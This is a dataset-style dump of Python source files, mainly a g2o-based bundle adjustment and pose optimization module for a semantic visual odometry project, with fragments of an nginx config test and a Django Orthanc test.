:param config: the nginx config
:return:
"""
assert "proxy_connect_timeout 60s;" in config
assert "proxy_read_timeout 60s;" in config
assert "proxy_send_timeout 60s;" in config
assert "proxy_set_header Upgrade $http_upgrade;" in config
assert "proxy_http_version 1.1;" in config
assert "proxy_next_upstream error timeout;" in config
assert "proxy_next_upstream_timeout 0s;" in config
assert "proxy_next_upstream_tries 0;" in config
| 35.458015 | 117 | 0.669107 |
be93e61f1a9573e5f997abeaf765390a53e1ff13 | 32,948 | py | Python | python/pysvso/optimizers/bundle_adjust.py | mfkiwl/SEMANTIC_VISUAL_SUPPORTED_ODEMETRY | 2249bf358f51b337eb52a347ea7d46bff0654576 | [
"Apache-2.0"
] | 191 | 2020-07-01T11:57:17.000Z | 2022-03-23T12:40:43.000Z | python/pysvso/optimizers/bundle_adjust.py | mfkiwl/SEMANTIC_VISUAL_SUPPORTED_ODEMETRY | 2249bf358f51b337eb52a347ea7d46bff0654576 | [
"Apache-2.0"
] | 10 | 2020-07-06T12:41:51.000Z | 2022-02-09T23:43:11.000Z | python/pysvso/optimizers/bundle_adjust.py | mfkiwl/SEMANTIC_VISUAL_SUPPORTED_ODEMETRY | 2249bf358f51b337eb52a347ea7d46bff0654576 | [
"Apache-2.0"
] | 45 | 2020-07-01T13:31:20.000Z | 2022-02-03T07:21:42.000Z | import os
import sys
try:
    # Python 2: reduce is a builtin
    reduce
except:
    # Python 3: reduce lives in functools
from functools import reduce
import numpy as np
import logging
_logger = logging.getLogger("bundle_adjust")
from pysvso.lib.sys import add_path
from pysvso.lib.misc import AtomicCounter
# pwd = os.path.dirname(os.path.realpath(__file__))
# add_path(os.path.join(pwd, '..', 'config'))
# from config import Settings
from pysvso.config import Settings
# print(sys.path)
# add compiled pybind11 binding lib of g2o for python
class OptimizerConfig(Settings):
pass
optimizer_config = OptimizerConfig("pysvso.optimizers.settings")
add_path(optimizer_config.G2OPYLIB_ROOT)
import g2o
# print(dir(g2o))
class Optimizer(g2o.SparseOptimizer):
def __init__(self):
super().__init__()
def vertex_seq_generate(self, entity_name, entity_idx):
v_idx = self.vertex_seq_generator()
vertice = self._ivq.get(entity_name, None)
if vertice is None:
vertice = {}
self._ivq[entity_name] = vertice
vertice[entity_idx] = v_idx
return v_idx
def indexOfVertex(self, entity_name, entity_idx):
vertice = self._ivq.get(entity_name, None)
if vertice is None:
raise Exception("No %s has been registered" % entity_name)
v_idx = vertice.get(entity_idx, None)
if v_idx is None:
raise Exception("Could not find vertex for %s %d" % (entity_name, entity_idx))
return v_idx
def get_pose(self, entity_name, frame_key):
v_idx = self.indexOfVertex(entity_name, frame_key)
pose = self.vertex(v_idx).estimate()
##
pose = pose.inverse()
##
return pose
def get_point(self, entity_name, point_key):
v_idx = self.indexOfVertex(entity_name, point_key)
point = self.vertex(v_idx).estimate()
return point
def edge_seq_generate(self, key):
e_idx = self.edge_seq_generator()
_KEY_NAME = "VERTEX,VERTEX"
edges = self._ieq.get(_KEY_NAME, None)
if edges is None:
edges = {}
self._ieq[_KEY_NAME] = edges
edges[key] = e_idx
return e_idx
def EstimateError(self):
frames = self._map.get_active_frames()
landmarks = self._map.trackList()
pointCloud = self._map.trackPointsList()
rsmes = [None, 0.]
for i, frame in enumerate(frames):
cam = frame.camera
if cam is None:
continue
refined_pose = self.get_pose("Frame", frame.seq)
# @todo : TODO estimate error of poses
for _, point in pointCloud.items():
refined_point = self.get_point("MapPoint", point.seq)
            err = point.data - refined_point
rsmes[1] += np.sum(err ** 2)
if self.USE_LANDMARKS:
for _, landmark in landmarks.items():
centroid = landmark.Centroid()
refined_point = self.get_point("MapPoint", centroid.seq)
err = point.data - refined_point
rsmes[1] += np.sum(err ** 2)
pass
pass
if self.USE_LANDMARKS:
rsmes[1] /= float(len(pointCloud) + len(landmarks)) + 1e-3
else:
rsmes[1] /= float(len(pointCloud)) + 1e-3
return rsmes
def UpdateMap(self):
frames = self._map.get_active_frames()
landmarks = self._map.trackList()
pointCloud = self._map.trackPointsList()
for i, frame in enumerate(frames):
cam = frame.camera
if cam is None:
continue
frame.update_pose(self.get_pose("Frame", frame.seq))
for _, point in pointCloud.items():
refined_point = self.get_point("MapPoint", point.seq)
print("refined mappoint %s position:" % point, refined_point)
point.update(*refined_point)
if self.USE_LANDMARKS:
for _, landmark in landmarks.items():
centroid = landmark.Centroid()
refined_point = self.get_point("MapPoint", centroid.seq)
print("refined landmark centroid %s position:" % centroid, refined_point)
centroid.update(*refined_point)
pass
pass
# For the moment we use g2o for fast development; later we will use our own graph optimizer based
# on the SBA algorithm
class BundleAdjustment(Optimizer):
def __init__(self):
super().__init__()
        # g2o::BlockSolver_6_3(g2o::BlockSolver_6_3::LinearSolverType*)
linear_solver = g2o.BlockSolverSE3(g2o.LinearSolverCSparseSE3())
solver = g2o.OptimizationAlgorithmLevenberg(linear_solver)
super().set_algorithm(solver)
# additional parameters
#
self._map = None
#
self.vertex_seq_generator = AtomicCounter()
self.edge_seq_generator = AtomicCounter()
# Point | Frame | Landmark -> Vertex mapping
# inverse vertex query
self._ivq = {}
# (Vertex, Vetex) -> Edge mapping, a sparse matrix
# inverse edges query
self._ieq = {}
#
self.USE_LANDMARKS = False
def set_FromMap(self, map):
self._map = map
return self
# def Init(self):
# frames = self._map.get_active_frames()
# landmarks = self._map.trackList()
# pointCloud = self._map.trackPointsList()
#
# # construct graph
# # set key frame as vertices
# for i, frame in enumerate(frames):
# cam = frame.camera
# pose = None
# if cam is None:
# continue
# pose = g2o.SE3Quat(cam.R0, cam.t0.reshape(3, ))
# v_idx = self.vertex_seq_generate("Frame", frame.seq)
# # only set the first frame as stational piont
# # self.add_pose(v_idx, pose, False)#fixed=frame.seq == 1)
#
# # when use ground truth
# self.add_pose(v_idx, pose, fixed=frame.seq == 1)
#
# # set array of MapPoint as vertices
# for _, point in pointCloud.items():
# v = point.data
# v_idx = self.vertex_seq_generate("MapPoint", point.seq)
# self.add_point(v_idx, v, marginalized=True)
#
# # set edges
# observations = point.frames
#
# for frame_key, pixel_pos in observations.items():
# frame = self._map.findFrame(frame_key)
# cam = frame.camera
# if cam is None:
# continue
# key = (v_idx, self.indexOfVertex("Frame", frame_key))
# e_idx = self.edge_seq_generate(key)
#
# # measurement
# px = frame.pixels[pixel_pos]
#
# # @todo: TODO compute invSigma for : see ORBSlam implementation for details
# invSigma = 1.
#
# if not isinstance(key[1], int):
# print("key[1]", key[1])
# raise Exception("Wrong value!")
# edge = self.add_edge(e_idx, key[0], key[1], px.data,
# information=np.identity(2) * invSigma)
#
# # set camera parameters to compute reprojection error with measurements
# cam = frame.camera
# device = cam.device
#
# # modify python/types/sba/type_six_dof_expmap.h#L81
# #
# # Projection using focal_length in x and y directions
# # py::class_<EdgeSE3ProjectXYZ, BaseBinaryEdge<2, Vector2D, VertexSBAPointXYZ, VertexSE3Expmap>>(m, "EdgeSE3ProjectXYZ")
# # .def(py::init<>())
# # .def("compute_error", &EdgeSE3ProjectXYZ::computeError)
# # .def("is_depth_positive", &EdgeSE3ProjectXYZ::isDepthPositive)
# # .def("cam_project", &EdgeSE3ProjectXYZ::cam_project)
# # + .def_readwrite("fx", &EdgeSE3ProjectXYZ::fx)
# # + .def_readwrite("fy", &EdgeSE3ProjectXYZ::fy)
# # + .def_readwrite("cx", &EdgeSE3ProjectXYZ::cx)
# # + .def_readwrite("cy", &EdgeSE3ProjectXYZ::cy)
# # ;
# #
# edge.fx = device.fx
# edge.fy = device.fy
# edge.cx = device.cx
# edge.cy = device.cy
#
# # check our modification is correct: I am not sure whether g2opy runs as expected so we check the result manually.
#
# measurement = edge.cam_project(edge.vertex(1).estimate().map(edge.vertex(0).estimate()))
# print("Measurement: %s" % measurement)
# print("px: %s" % px.data)
# # assert int(measurement[0]) == int(px.x) and int(measurement[1]) == int(px.y)
# pass
#
# if self.USE_LANDMARKS:
# # treat landmark as stationary points group and compute key points from it
# logging.info("Using landmarks for bundle adjustment ...")
# # set landmarks as vertices
# for _, landmark in landmarks.items():
# # representing landmark as top centre point
# logging.info("%s points size %d" % (landmark, len(landmark.points)))
#
# # compute bbox
# # Note: I just use AABB instead of OBB, because to estimate OBB we need dense points
# # bbox = landmark.computeAABB()
# # topCentre = bbox.topCentre()
# # v = topCentre.data
#
# centroid = landmark.Centroid()
# v = centroid.data
# v_idx = self.vertex_seq_generate("MapPoint", centroid.seq)
#
# self.add_point(v_idx, v, marginalized=True)
#
# # estimate measurement
# # we suppose the positions (centers) of landmarks are stable, which will be used in PnP later
# # @todo : TODO
#
# # set edges
# observations = landmark.observations
#
# # choose an estimate pose
# visited_pxes = {}
# for (point_key, frame_seq), pixel_pos in observations.items():
# point = pointCloud[point_key]
# frame = frames[frame_seq]
# cam = frame.camera
# if cam is None:
# continue
#
# px_pose = point[frame_seq]
# px = frame.pixels[pixel_pos]
#
# if visited_pxes.get(frame_seq, None) is None:
# visited_pxes = []
# visited_pxes[frame_seq].append(px.data)
# pass
#
# for frame_seq, projected_pixels in visited_pxes:
# reduced = reduce(lambda pre, cur: pre + cur, projected_pixels)
# reduced /= len(projected_pixels)
# key = (v_idx, self.indexOfVertex("Frame", frame_seq))
# e_idx = self.edge_seq_generate(key)
#
# # @todo: TODO compute invSigma for : see ORBSlam implementation for details
# # I have little idea how this should be set
# invSigma = 1.
#
# edge = self.add_edge(self.vertexPair_edges[key], key[0], key[1], reduced,
# information=np.identity(2) * invSigma)
#
# # set camera parameters to compute reprojection error with measurements
# cam = frame.camera
# device = cam.device
#
# # add camera parameters to compute reprojection errors
# edge.fx = device.fx
# edge.fy = device.fy
# edge.cx = device.cx
# edge.cy = device.cy
#
# pass
# pass
#
# logging.info("Number of vertices:", len(self.vertices()))
# logging.info("Number of edges:", len(self.edges()))
# return self
def Init(self):
frames = self._map.get_active_frames()
landmarks = self._map.trackList()
pointCloud = self._map.trackPointsList()
once = False
# construct graph
# set key frame as vertices
for i, frame in enumerate(frames):
cam = frame.camera
pose = None
if cam is None:
continue
pose = g2o.SE3Quat(cam.R0, cam.t0.reshape(3, ))
v_idx = self.vertex_seq_generate("Frame", frame.seq)
            # only set the first frame as a stationary point
            # self.add_pose(v_idx, pose, False)#fixed=frame.seq == 1)
            # when using ground truth
self.add_pose(v_idx, pose, fixed=frame.seq == 1)
if not once:
K = cam.K
focal_length = (K[0, 0] + K[1, 1]) / 2
pp = (K[0, 2], K[1, 2])
cam_p = g2o.CameraParameters(focal_length, pp, 0)
cam_p.set_id(0)
self.add_parameter(cam_p)
once = True
# set array of MapPoint as vertices
for _, point in pointCloud.items():
v = point.data # + np.random.randn(3)
v_idx = self.vertex_seq_generate("MapPoint", point.seq)
self.add_point(v_idx, v, marginalized=True)
# set edges
try:
observations = point.frames
except AttributeError:
observations = point.observations
for frame_key, pixel_pos in observations.items():
frame = self._map.findFrame(frame_key)
cam = frame.camera
if cam is None:
continue
key = (v_idx, self.indexOfVertex("Frame", frame_key))
e_idx = self.edge_seq_generate(key)
# measurement
px = frame.pixels[pixel_pos]
# @todo: TODO compute invSigma for : see ORBSlam implementation for details
invSigma = 1.
if not isinstance(key[1], int):
print("key[1]", key[1])
raise Exception("Wrong value!")
edge = self.add_edge(e_idx, key[0], key[1], px.data, # + np.random.randn(2),
information=np.identity(2) * invSigma)
# set camera parameters to compute reprojection error with measurements
cam = frame.camera
device = cam.device
# modify python/types/sba/type_six_dof_expmap.h#L81
#
# Projection using focal_length in x and y directions
# py::class_<EdgeSE3ProjectXYZ, BaseBinaryEdge<2, Vector2D, VertexSBAPointXYZ, VertexSE3Expmap>>(m, "EdgeSE3ProjectXYZ")
# .def(py::init<>())
# .def("compute_error", &EdgeSE3ProjectXYZ::computeError)
# .def("is_depth_positive", &EdgeSE3ProjectXYZ::isDepthPositive)
# .def("cam_project", &EdgeSE3ProjectXYZ::cam_project)
# + .def_readwrite("fx", &EdgeSE3ProjectXYZ::fx)
# + .def_readwrite("fy", &EdgeSE3ProjectXYZ::fy)
# + .def_readwrite("cx", &EdgeSE3ProjectXYZ::cx)
# + .def_readwrite("cy", &EdgeSE3ProjectXYZ::cy)
# ;
#
# edge.fx = device.fx
# edge.fy = device.fy
# edge.cx = device.cx
# edge.cy = device.cy
# check our modification is correct: I am not sure whether g2opy runs as expected so we check the result manually.
# used for EdgeSE3ProjectXYZ
# measurement = edge.cam_project( edge.vertex(1).estimate().map( edge.vertex(0).estimate() ) )
# print("Measurement: %s" % measurement)
# print("px: %s" % px.data)
# assert int(measurement[0]) == int(px.x) and int(measurement[1]) == int(px.y)
pass
if self.USE_LANDMARKS:
# treat landmark as stationary points group and compute key points from it
logging.info("Using landmarks for bundle adjustment ...")
# set landmarks as vertices
for _, landmark in landmarks.items():
# representing landmark as top centre point
logging.info("%s points size %d" % (landmark, len(landmark.points)))
# compute bbox
# Note: I just use AABB instead of OBB, because to estimate OBB we need dense points
# bbox = landmark.computeAABB()
# topCentre = bbox.topCentre()
# v = topCentre.data
centroid = landmark.Centroid()
v = centroid.data
v_idx = self.vertex_seq_generate("MapPoint", centroid.seq)
self.add_point(v_idx, v, marginalized=True)
# estimate measurement
# we suppose the positions (centers) of landmarks are stable, which will be used in PnP later
# @todo : TODO
# set edges
observations = landmark.observations
# choose an estimate pose
visited_pxes = {}
for (point_key, frame_seq), pixel_pos in observations.items():
point = pointCloud[point_key]
                    # frame = frames[frame_seq - 1]
                    frame = self._map.findFrame(frame_seq)
cam = frame.camera
if cam is None:
continue
px_pose = point[frame_seq]
px = frame.pixels[pixel_pos]
                    if visited_pxes.get(frame_seq, None) is None:
                        visited_pxes[frame_seq] = []
                    visited_pxes[frame_seq].append(px.data)
pass
                for frame_seq, projected_pixels in visited_pxes.items():
reduced = reduce(lambda pre, cur: pre + cur, projected_pixels)
reduced /= len(projected_pixels)
key = (v_idx, self.indexOfVertex("Frame", frame_seq))
e_idx = self.edge_seq_generate(key)
# @todo: TODO compute invSigma for : see ORBSlam implementation for details
# I have little idea how this should be set
invSigma = 1.
                    edge = self.add_edge(e_idx, key[0], key[1], reduced,
                                         information=np.identity(2) * invSigma)
# set camera parameters to compute reprojection error with measurements
cam = frame.camera
device = cam.device
# add camera parameters to compute reprojection errors
# edge.fx = device.fx
# edge.fy = device.fy
# edge.cx = device.cx
# edge.cy = device.cy
pass
pass
logging.info("Number of vertices:", len(self.vertices()))
logging.info("Number of edges:", len(self.edges()))
return self
def optimize(self, max_iterations=5, verbose=True):
super().initialize_optimization()
super().set_verbose(verbose)
super().optimize(max_iterations)
return self
# @todo :TODO
# pose: g2o.Isometry3d or g2o.SE3Quat
def add_pose(self, pose_id, pose, fixed=False):
v_se3 = g2o.VertexSE3Expmap()
v_se3.set_id(pose_id)
v_se3.set_fixed(fixed)
##
##
v_se3.set_estimate(pose.inverse())
super().add_vertex(v_se3)
return v_se3
# point: numpy array with shape=(3,), similar to Eigen::Vector3
def add_point(self, point_id, point, fixed=False, marginalized=True):
v_p = g2o.VertexSBAPointXYZ()
v_p.set_id(point_id)
v_p.set_estimate(point)
v_p.set_marginalized(marginalized)
v_p.set_fixed(fixed)
super().add_vertex(v_p)
return v_p
# @todo : TODO
def add_edge(self, edge_id, point_id, pose_id,
measurement,
information=np.identity(2),
robust_kernel=g2o.RobustKernelHuber(np.sqrt(5.991))):
# edge = g2o.EdgeSE3ProjectXYZ()
edge = g2o.EdgeProjectXYZ2UV()
edge.set_id(edge_id)
edge.set_vertex(0, self.vertex(point_id) )
edge.set_vertex(1, self.vertex(pose_id) )
edge.set_measurement(measurement)
edge.set_information(information)
if robust_kernel is not None:
edge.set_robust_kernel(robust_kernel)
edge.set_parameter_id(0,0)
super().add_edge(edge)
return edge
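# --- illustrative usage sketch (not part of the original module) ---
# Typical mapping-thread flow: build the graph from the current map, optimize, inspect the
# error estimate and write the refined poses/points back. `world_map` is assumed to be a
# populated pysvso Map instance provided by the caller, not defined here.
#
#   ba = BundleAdjustment()
#   ba.set_FromMap(world_map)
#   ba.Init()
#   ba.optimize(max_iterations=10, verbose=False)
#   print(ba.EstimateError())
#   ba.UpdateMap()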
## == Used in mapping thread
class LocalBA(BundleAdjustment):
def __init__(self):
super().__init__()
#
self.frame = None
# all the points can be viewed by this frame
self.points = None
#
self.measurements = None
#
self.mappoints = []
#
self.local_key_frames = {}
#
self.Thr = 15
#
self.adjusted_frames = None
#
self.fixed_frames = None
def set_FromFrame(self, frame):
self.frame = frame
return self
def set_FromPoints(self, points):
self.points = points
return self
def set_FromMeasurements(self, measurements):
self.measurements = measurements
return self
# override
def Init(self):
adjusted, fixed = self.get_local_keyframes()
print("[LocalBA] %d adjusted frames" % len(adjusted))
print("[LocalBA] %d fixed frames" % len(fixed))
self.adjusted_frames = adjusted
self.fixed_frames = fixed
if len(adjusted) == 0:
print("Something wrong here ...")
pass
once = False
# construct graph
# set key frame as vertices
for i, frame in enumerate(adjusted):
cam = frame.camera
pose = None
if cam is None:
continue
pose = g2o.SE3Quat(cam.R0, cam.t0.reshape(3, ))
v_idx = self.vertex_seq_generate("Frame", frame.seq)
            # only set the first frame as a stationary point
            # self.add_pose(v_idx, pose, False)#fixed=frame.seq == 1)
            # when using ground truth
self.add_pose(v_idx, pose, fixed=False)
if not once:
K = cam.K
focal_length = (K[0, 0] + K[1, 1]) / 2
pp = (K[0, 2], K[1, 2])
cam_p = g2o.CameraParameters(focal_length, pp, 0)
cam_p.set_id(0)
self.add_parameter(cam_p)
once = True
pointCloud, Measurement = frame.get_measurements()
N = len(pointCloud)
for i in range(N):
point = pointCloud[i]
v = point.data # + np.random.randn(3)
v_idx = self.vertex_seq_generate("MapPoint", point.seq)
self.add_point(v_idx, v, marginalized=True)
# set edge
cam = frame.camera
if cam is None:
continue
key = (v_idx, self.indexOfVertex("Frame", frame.seq))
e_idx = self.edge_seq_generate(key)
# measurement
px = Measurement[i]
# @todo: TODO compute invSigma for : see ORBSlam implementation for details
invSigma = 1.
if not isinstance(key[1], int):
print("key[1]", key[1])
raise Exception("Wrong value!")
edge = self.add_edge(e_idx, key[0], key[1], px.data, # + np.random.randn(2),
information=np.identity(2) * invSigma)
self.mappoints.append((point, frame.seq, px))
# set camera parameters to compute reprojection error with measurements
cam = frame.camera
device = cam.device
# modify python/types/sba/type_six_dof_expmap.h#L81
#
# Projection using focal_length in x and y directions
# py::class_<EdgeSE3ProjectXYZ, BaseBinaryEdge<2, Vector2D, VertexSBAPointXYZ, VertexSE3Expmap>>(m, "EdgeSE3ProjectXYZ")
# .def(py::init<>())
# .def("compute_error", &EdgeSE3ProjectXYZ::computeError)
# .def("is_depth_positive", &EdgeSE3ProjectXYZ::isDepthPositive)
# .def("cam_project", &EdgeSE3ProjectXYZ::cam_project)
# + .def_readwrite("fx", &EdgeSE3ProjectXYZ::fx)
# + .def_readwrite("fy", &EdgeSE3ProjectXYZ::fy)
# + .def_readwrite("cx", &EdgeSE3ProjectXYZ::cx)
# + .def_readwrite("cy", &EdgeSE3ProjectXYZ::cy)
# ;
#
# edge.fx = device.fx
# edge.fy = device.fy
# edge.cx = device.cx
# edge.cy = device.cy
# ===== FIXED =====
for i, frame in enumerate(fixed):
cam = frame.camera
pose = None
if cam is None:
continue
pose = g2o.SE3Quat(cam.R0, cam.t0.reshape(3, ))
v_idx = self.vertex_seq_generate("Frame", frame.seq)
            # only set the first frame as a stationary point
            # self.add_pose(v_idx, pose, False)#fixed=frame.seq == 1)
            # when using ground truth
self.add_pose(v_idx, pose, fixed=True)
if not once:
K = cam.K
focal_length = (K[0, 0] + K[1, 1]) / 2
pp = (K[0, 2], K[1, 2])
cam_p = g2o.CameraParameters(focal_length, pp, 0)
cam_p.set_id(0)
self.add_parameter(cam_p)
once = True
pointCloud, Measurement = frame.get_measurements()
N = len(pointCloud)
for i in range(N):
point = pointCloud[i]
v = point.data # + np.random.randn(3)
v_idx = self.vertex_seq_generate("MapPoint", point.seq)
self.add_point(v_idx, v, marginalized=True)
# set edge
cam = frame.camera
if cam is None:
continue
key = (v_idx, self.indexOfVertex("Frame", frame.seq))
e_idx = self.edge_seq_generate(key)
# measurement
px = Measurement[i]
# @todo: TODO compute invSigma for : see ORBSlam implementation for details
invSigma = 1.
if not isinstance(key[1], int):
print("key[1]", key[1])
raise Exception("Wrong value!")
edge = self.add_edge(e_idx, key[0], key[1], px.data, # + np.random.randn(2),
information=np.identity(2) * invSigma)
self.mappoints.append((point, frame.seq, px))
# set camera parameters to compute reprojection error with measurements
cam = frame.camera
device = cam.device
# modify python/types/sba/type_six_dof_expmap.h#L81
#
# Projection using focal_length in x and y directions
# py::class_<EdgeSE3ProjectXYZ, BaseBinaryEdge<2, Vector2D, VertexSBAPointXYZ, VertexSE3Expmap>>(m, "EdgeSE3ProjectXYZ")
# .def(py::init<>())
# .def("compute_error", &EdgeSE3ProjectXYZ::computeError)
# .def("is_depth_positive", &EdgeSE3ProjectXYZ::isDepthPositive)
# .def("cam_project", &EdgeSE3ProjectXYZ::cam_project)
# + .def_readwrite("fx", &EdgeSE3ProjectXYZ::fx)
# + .def_readwrite("fy", &EdgeSE3ProjectXYZ::fy)
# + .def_readwrite("cx", &EdgeSE3ProjectXYZ::cx)
# + .def_readwrite("cy", &EdgeSE3ProjectXYZ::cy)
# ;
#
# edge.fx = device.fx
# edge.fy = device.fy
# edge.cx = device.cx
# edge.cy = device.cy
pass
def get_local_keyframes(self):
frames = self._map.get_active_frames()
pointCloud = self.points
adjusted = set()
fixed = set()
# select key frames
for _, point in pointCloud.items():
# observations = point.frames
# for frame_key, pixel_pos in observations.items(): # this only contains key points records
for frame in frames:
frame_key = frame.seq
camera = frame.camera
# print("viewing point %s using camera from Frame#%d" % (point, frame.seq))
cam_pt = camera.viewWorldPoint(point)
projection = camera.view(cam_pt)
if projection is None:
continue
if self.local_key_frames.get(frame_key, None) is None:
self.local_key_frames[frame_key] = 0
self.local_key_frames[frame_key] += 1
for frame_key, cnt in self.local_key_frames.items():
if cnt > self.Thr:
frame = self._map.findFrame(frame_key)
print("[LocalBA] add %s to adjusted" % frame)
adjusted.add(frame)
for frame in frames:
if frame not in adjusted:
print("[LocalBA] add %s to fixed" % frame)
fixed.add(frame)
return adjusted, fixed
# @todo : TODO
def EstimateError(self):
pass
# @todo : TODO
def UpdateMap(self):
landmarks = self._map.trackList()
for i, frame in enumerate(self.adjusted_frames):
cam = frame.camera
if cam is None:
continue
frame.update_pose(self.get_pose("Frame", frame.seq))
for point, frame_key, px in self.mappoints:
refined_point = self.get_point("MapPoint", point.seq)
# print("refined mappoint %s position:" % point, refined_point)
point.update(*refined_point)
if self.USE_LANDMARKS:
for _, landmark in landmarks.items():
centroid = landmark.Centroid()
refined_point = self.get_point("MapPoint", centroid.seq)
# print("refined landmark centroid %s position:" % centroid, refined_point)
centroid.update(*refined_point)
pass
pass
pass
## ===============================
class PoseOptimization(Optimizer):
def __init__(self):
super().__init__()
        # g2o::BlockSolver_6_3(g2o::BlockSolver_6_3::LinearSolverType*)
linear_solver = g2o.BlockSolverSE3(g2o.LinearSolverCholmodSE3())
solver = g2o.OptimizationAlgorithmLevenberg(linear_solver)
super().set_algorithm(solver)
# additional parameters
terminate = g2o.SparseOptimizerTerminateAction()
terminate.set_gain_threshold(1e-6)
super().add_post_iteration_action(terminate)
#
self._map = None
#
self.frame = None
#
self.points = None
#
self.vSE3 = None
#
self.measurements = None
#
self.vertex_seq_generator = AtomicCounter()
self.edge_seq_generator = AtomicCounter()
# Point | Frame | Landmark -> Vertex mapping
# inverse vertex query
self._ivq = {}
# (Vertex, Vetex) -> Edge mapping, a sparse matrix
# inverse edges query
self._ieq = {}
#
self.USE_LANDMARKS = False
#
self.edges = []
def set_FromMap(self, map):
self._map = map
return self
def set_FromFrame(self, frame):
self.frame = frame
return self
def set_FromPoints(self, points):
self.points = points
return self
def set_FromMeasurements(self, measurements):
self.measurements = measurements
return self
# @todo : TODO
def Init(self):
pointCloud = self.points
measurements = self.measurements
once = False
# set current frame as vertex to be optimized
cam = self.frame.camera
if not once:
K = cam.K
focal_length = (K[0, 0] + K[1, 1]) / 2
pp = (K[0, 2], K[1, 2])
cam_p = g2o.CameraParameters(focal_length, pp, 0)
cam_p.set_id(0)
self.add_parameter(cam_p)
once = True
pose = g2o.SE3Quat(cam.R0, cam.t0.reshape(3, ))
v_idx = self.vertex_seq_generate("Frame", self.frame.seq)
self.vSE3 = self.add_pose(v_idx, pose, False)
# add point
# set array of MapPoint as vertices
for _, point in pointCloud.items():
v = point.data
v_idx = self.vertex_seq_generate("MapPoint", point.seq)
# We only optimize pose, it is also possible to use g2o::EdgeSE3ProjectXYZOnlyPose
self.add_point(v_idx, v, marginalized=True, fixed=True)
# viewed by the frame
key = (v_idx, self.indexOfVertex("Frame", self.frame.seq))
e_idx = self.edge_seq_generate(key)
# measurement
measurement = measurements[point.seq]
px = measurement.px2d2
# @todo: TODO compute invSigma for : see ORBSlam implementation for details
# I have little idea how this should be set
invSigma = 1.
edge = self.add_edge(e_idx, key[0], key[1], px.data,
information=np.identity(2) * invSigma)
#
device = self.frame.camera.device
# modify python/types/sba/type_six_dof_expmap.h#L81
#
# Projection using focal_length in x and y directions
# py::class_<EdgeSE3ProjectXYZ, BaseBinaryEdge<2, Vector2D, VertexSBAPointXYZ, VertexSE3Expmap>>(m, "EdgeSE3ProjectXYZ")
# .def(py::init<>())
# .def("compute_error", &EdgeSE3ProjectXYZ::computeError)
# .def("is_depth_positive", &EdgeSE3ProjectXYZ::isDepthPositive)
# .def("cam_project", &EdgeSE3ProjectXYZ::cam_project)
# + .def_readwrite("fx", &EdgeSE3ProjectXYZ::fx)
# + .def_readwrite("fy", &EdgeSE3ProjectXYZ::fy)
# + .def_readwrite("cx", &EdgeSE3ProjectXYZ::cx)
# + .def_readwrite("cy", &EdgeSE3ProjectXYZ::cy)
# ;
#
# edge.fx = device.fx
# edge.fy = device.fy
# edge.cx = device.cx
# edge.cy = device.cy
pass
    # PoseOptimization converges very quickly
def optimize(self, max_iterations=5, verbose=True, level=None):
if level is not None:
super().initialize_optimization(level)
else:
super().initialize_optimization()
super().set_verbose(verbose)
super().optimize(max_iterations)
return self
    # @todo : TODO
def optimizeWhileFiltering(self):
MaxIter = 5
it = 0
vSE3 = self.vSE3
cam = self.frame.camera
outliers = {}
while it < MaxIter:
vSE3.set_estimate(g2o.SE3Quat(cam.R0, cam.t0.reshape(3, )))
self.optimize(level=it)
# @todo : TODO
# see ORBSlam PoseOptimization
pass
pass
def add_pose(self, pose_id, pose, fixed=False):
v_se3 = g2o.VertexSE3Expmap()
v_se3.set_id(pose_id)
v_se3.set_fixed(fixed)
v_se3.set_estimate(pose.inverse())
super().add_vertex(v_se3)
return v_se3
# point: numpy array with shape=(3,), similar to Eigen::Vector3
def add_point(self, point_id, point, fixed=False, marginalized=True):
v_p = g2o.VertexSBAPointXYZ()
v_p.set_id(point_id)
v_p.set_estimate(point)
v_p.set_marginalized(marginalized)
v_p.set_fixed(fixed)
super().add_vertex(v_p)
return v_p
# @todo : TODO
def add_edge(self, edge_id, point_id, pose_id,
measurement,
information=np.identity(2),
robust_kernel=g2o.RobustKernelHuber(np.sqrt(5.991))):
# edge = g2o.EdgeSE3ProjectXYZOnlyPose()
# edge = g2o.EdgeSE3ProjectXYZ()
edge = g2o.EdgeProjectXYZ2UV()
edge.set_id(edge_id)
edge.set_vertex(0, self.vertex(point_id))
edge.set_vertex(1, self.vertex(pose_id))
edge.set_measurement(measurement)
edge.set_information(information)
if robust_kernel is not None:
edge.set_robust_kernel(robust_kernel)
edge.set_parameter_id(0, 0)
super().add_edge(edge)
return edge
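# --- illustrative usage sketch (not part of the original module) ---
# Typical tracking-thread flow: refine only the current frame's pose against fixed map
# points. `world_map`, `frame`, `points` and `measurements` are assumed to come from the
# tracker and are not defined here.
#
#   po = PoseOptimization()
#   po.set_FromMap(world_map).set_FromFrame(frame)
#   po.set_FromPoints(points).set_FromMeasurements(measurements)
#   po.Init()
#   po.optimize(max_iterations=10)
#   refined_pose = po.get_pose("Frame", frame.seq)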
if __name__ == "__main__":
edge = g2o.EdgeSE3ProjectXYZ()
# edge = g2o.EdgeSE3ProjectXYZOnlyPose()
# passed!
print(edge.fx) | 31.926357 | 130 | 0.612298 |
a9d4d662dff18c26344425cc847a0cdca9ae154a | 372 | py | Python | app/tests/integration/test_orthanc_class.py | salimkanoun/Rest_Radiomics | eda8b2e7d0a95c0fe789bcf5758a4a1cef2c6996 | [
"MIT"
] | null | null | null | app/tests/integration/test_orthanc_class.py | salimkanoun/Rest_Radiomics | eda8b2e7d0a95c0fe789bcf5758a4a1cef2c6996 | [
"MIT"
] | 1 | 2021-06-21T19:38:00.000Z | 2021-06-21T19:38:00.000Z | app/tests/integration/test_orthanc_class.py | salimkanoun/Rest_Radiomics | eda8b2e7d0a95c0fe789bcf5758a4a1cef2c6996 | [
"MIT"
] | 2 | 2021-06-21T12:28:28.000Z | 2021-06-21T12:30:37.000Z | from django.test import TestCase
from ...gaelo_processing.models.Orthanc import Orthanc
class test_orthanc_class(TestCase):
def test_get_zip_from_orthanc(self):
        orthanc_instance = Orthanc()
        zip_path = orthanc_instance.get_zip_from_orthanc(
"3a84b7f7-d0c66087-d70b292e-0c585356-56b6ccb3")
print('test get_zip_from_orthanc validate') | 33.818182 | 59 | 0.75 |
c44f3760ccf9dfdc8bbe6f4e5e235c264d30339d | 7,446 | py | Python | Project2/nnreg/dataloader.py | marianylund/fysstkprojects | 7ef97cdf3356dad8ee931a19812d3b0f1625997b | [
"MIT"
] | null | null | null | Project2/nnreg/dataloader.py | marianylund/fysstkprojects | 7ef97cdf3356dad8ee931a19812d3b0f1625997b | [
"MIT"
] | null | null | null | Project2/nnreg/dataloader.py | marianylund/fysstkprojects | 7ef97cdf3356dad8ee931a19812d3b0f1625997b | [
